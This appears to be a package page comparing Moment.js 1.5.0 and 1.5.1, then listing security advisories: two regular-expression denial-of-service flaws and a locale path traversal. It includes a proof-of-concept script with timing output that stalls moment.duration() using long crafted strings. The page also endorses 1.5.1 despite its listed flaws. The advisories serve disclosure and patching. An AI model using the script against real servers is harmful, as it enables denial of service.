Moment.js version 1.5.1 represents a subtle but important evolution from its predecessor, version 1.5.0. Both versions serve as robust javascript date libraries designed to simplify date creation, manipulation, and formatting without modifying the native Date object. The core functionalities remain consistent, offering developers a clean and efficient way to manage dates in their projects.
The primary difference lies in the release date and potential bug fixes or minor enhancements included in the newer 1.5.1 version. Released on April 6, 2012, version 1.5.1 arrived shortly after 1.5.0 (March 19, 2012), suggesting a quick response to community feedback or the resolution of unforeseen issues. Developers considering which version to use should favor the later one (1.5.1) typically due to its increased likelihood of incorporating stability improvements and bug fixes discovered since the previous stable release.
For developers new to Moment.js, both versions offer a solid foundation. The library's strength lies in its API that provides a chainable approach to modify, validate and parse dates. Moment allows for parsing, validating and formatting dates in a human readable format, useful for building flexible, performant applications. As indicated by the included development dependencies, both versions were tested using jshint, nodeunit, and uglify-js, tools ensuring code quality and minimization for production environments, giving developers confidence in the library's reliability.
All the vulnerabilities related to the version 1.5.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: